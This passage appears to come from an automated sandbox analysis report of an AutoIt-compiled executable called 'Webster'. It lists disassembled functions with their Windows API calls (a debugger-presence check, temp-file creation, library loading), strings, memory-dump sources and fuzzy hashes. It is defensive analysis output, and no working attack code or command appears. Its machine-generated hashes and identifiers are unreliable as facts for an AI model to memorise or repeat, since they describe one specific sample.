                                                                                  • Instruction ID: 8a419a67a53a5c0189c1ca10eb092c0187819c34a5918370e45419dd430f2e78
                                                                                  • Opcode Fuzzy Hash: 61472351fd5291e4467a53e9d2e0d43d60006f30889aa6caf2cb96f96cc683d4
                                                                                  • Instruction Fuzzy Hash: A601A772A42105ABCF14EBA4CA56EFF73FC9F11340F60001AB84663391DE159E089671
                                                                                  Function 00AE54E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassName_wcscmp
                                                                                  • String ID: #32770
                                                                                  • API String ID: 2292705959-463685578
                                                                                  • Opcode ID: a2a1a420b7d694a721df51b8eb8d76d0fce8ef2f953fcbc533c852a95e4192bc
                                                                                  • Instruction ID: 00579647d145e96a8c657f7c5f85c44bbbc131ed900762ecfa13e6b01f2cff01
                                                                                  • Opcode Fuzzy Hash: a2a1a420b7d694a721df51b8eb8d76d0fce8ef2f953fcbc533c852a95e4192bc
                                                                                  • Instruction Fuzzy Hash: 79E0D17790022917D710EB59AC45FABFBECEB55771F000157FD04D7051DA609A4587E0
                                                                                  Function 00AD8892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AD88A0
                                                                                    • Part of subcall function 00AA3588: _doexit.LIBCMT ref: 00AA3592
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message_doexit
                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                  • API String ID: 1993061046-4017498283
                                                                                  • Opcode ID: 1e16a2d685e2c38bad614fea277fc2e4e8a5b380a910434f24bcfd76b71ef0ac
                                                                                  • Instruction ID: e11f1722949363fbdb474024671718a57092891df59959c498d97e674a0a7ff4
                                                                                  • Opcode Fuzzy Hash: 1e16a2d685e2c38bad614fea277fc2e4e8a5b380a910434f24bcfd76b71ef0ac
                                                                                  • Instruction Fuzzy Hash: F7D02B3238031836C22433E86D0BFCA3A888B06B90F10802AFB08661D38ED685D042D5
                                                                                  Function 00ABB4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00ABB544: _memset.LIBCMT ref: 00ABB551
                                                                                    • Part of subcall function 00AA0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00ABB520,?,?,?,00A8100A), ref: 00AA0B79
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00A8100A), ref: 00ABB524
                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A8100A), ref: 00ABB533
                                                                                  Strings
                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00ABB52E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                  • API String ID: 3158253471-631824599
                                                                                  • Opcode ID: c84a4f7806698804d33047d1e8f07f343507d4d1f6cf840835a60e9d9d6749a9
                                                                                  • Instruction ID: e1df1ceb6e1433a89597c922871f40940a4c5e6f043e593278714e74eff40441
                                                                                  • Opcode Fuzzy Hash: c84a4f7806698804d33047d1e8f07f343507d4d1f6cf840835a60e9d9d6749a9
                                                                                  • Instruction Fuzzy Hash: A0E06D702503118FD330AF29E504B827AE4AF04744F108A6DE457C3341DFF5E544CBA2
                                                                                  Function 00AC0251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00AC0091
                                                                                    • Part of subcall function 00AFC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00AC027A,?), ref: 00AFC6E7
                                                                                    • Part of subcall function 00AFC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AFC6F9
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00AC0289
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                  • String ID: WIN_XPe
                                                                                  • API String ID: 582185067-3257408948
                                                                                  • Opcode ID: 4075334bb272858fde70f89ab4dead9acdd09456a82c8cc8c3dca98a3751488b
                                                                                  • Instruction ID: 0d8a93b157c2d88d768de5fc104f38e31fea317965bb656f77d7834271e51657
                                                                                  • Opcode Fuzzy Hash: 4075334bb272858fde70f89ab4dead9acdd09456a82c8cc8c3dca98a3751488b
                                                                                  • Instruction Fuzzy Hash: E9F03970804109DFCB15EBA0CA88FECBBB8AB08300F260089E106B31A0CBB04F80DF21
                                                                                  Function 00AE9EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00AE9EB5
                                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00AE9ECC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Temp$FileNamePath
                                                                                  • String ID: aut
                                                                                  • API String ID: 3285503233-3010740371
                                                                                  • Opcode ID: e658cf3990d95926db19303711d32dcdccf80437f17f01a28aca3552d1f40f71
                                                                                  • Instruction ID: 03529b61ae3f818448b5b9061bd9356773183f4e02004c084672716ea82d6911
                                                                                  • Opcode Fuzzy Hash: e658cf3990d95926db19303711d32dcdccf80437f17f01a28aca3552d1f40f71
                                                                                  • Instruction Fuzzy Hash: 27D05E7554030DBBDB50AB90DC0EFDABB6CDB04B00F4082A1BF58D21A2DEB055D48BD5